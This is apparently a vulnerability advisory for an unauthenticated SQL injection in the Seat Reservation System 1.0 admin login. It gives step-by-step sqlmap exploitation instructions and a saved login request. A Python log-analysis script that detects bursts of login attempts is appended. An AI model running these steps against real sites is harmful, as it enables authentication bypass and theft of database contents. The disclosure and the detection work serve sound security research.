Seat Reservation System 1.0 SQL Injection

Seat Reservation System version 1.0 suffers from an unauthenticated remote SQL injection vulnerability.

MD5 | 4db79f048b2d69b73114c2fce6c9d015

# Title: Seat Reservation System 1.0 - Unauthenticated SQL Injection
# Exploit Author: Rahul Ramkumar
# Date: 2020-09-16
# Vendor Homepage:
# Software Link:
# Version: 1.0

# Description

The file admin_class.php does not perform input validation on the username
and password parameters. An attacker can send malicious input in the POST
request to /admin/ajax.php?action=login to bypass authentication, extract
sensitive information, etc.


1) Navigate to the admin login page

2) Fill in dummy values for the 'username' and 'password' fields and send the
request via an HTTP intercept tool

3) Save the request to a file, for example seat_reservation_sqli.req

POST /seat_reservation/admin/ajax.php?action=login HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
DNT: 1
Connection: close


4) Run sqlmap on the file:

sqlmap -r seat_reservation_sqli.req --dbms=mysql --threads=10
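
Detection note (an added example, not part of the original advisory): a request replayed from a saved file keeps the browser User-Agent stored in that file, so automated testing of the login endpoint is easier to spot by request rate than by client string. The sketch below flags clients that burst POSTs at /admin/ajax.php?action=login; the combined log format, the 10-second window, the threshold of 20 and the sample IP addresses are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined-log-format prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The endpoint named in the advisory, with action=login anywhere in the query.
LOGIN_TARGET = re.compile(r'/admin/ajax\.php\?(?:.*&)?action=login(?:&|$)')

def parse(line):
    """Return (ip, timestamp, method, target) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["target"]

def find_login_bursts(lines, window_seconds=10, threshold=20):
    """Return {ip: peak} for clients exceeding threshold login POSTs in a sliding window."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] == "POST" and LOGIN_TARGET.search(rec[3]):
            per_ip[rec[0]].append(rec[1])
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # shrink window from the left
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged

def sample_log():
    """Constructed sample: one client sends 40 login POSTs in 4 s, another logs in twice."""
    ua = '"Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101"'
    fmt = ('{ip} - - [16/Sep/2020:10:00:{s:02d} +0000] "POST /seat_reservation'
           '/admin/ajax.php?action=login HTTP/1.1" 200 1 "-" ' + ua)
    burst = [fmt.format(ip="203.0.113.7", s=i // 10) for i in range(40)]
    normal = [fmt.format(ip="198.51.100.4", s=s) for s in (5, 50)]
    return burst + normal

if __name__ == "__main__":
    for ip, peak in find_login_bursts(sample_log()).items():
        print(f"{ip}: {peak} login POSTs within 10 s")
```

Access logs do not record POST bodies, so this only surfaces the volume pattern; confirming what was sent requires application-level or WAF logging of the login parameters.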
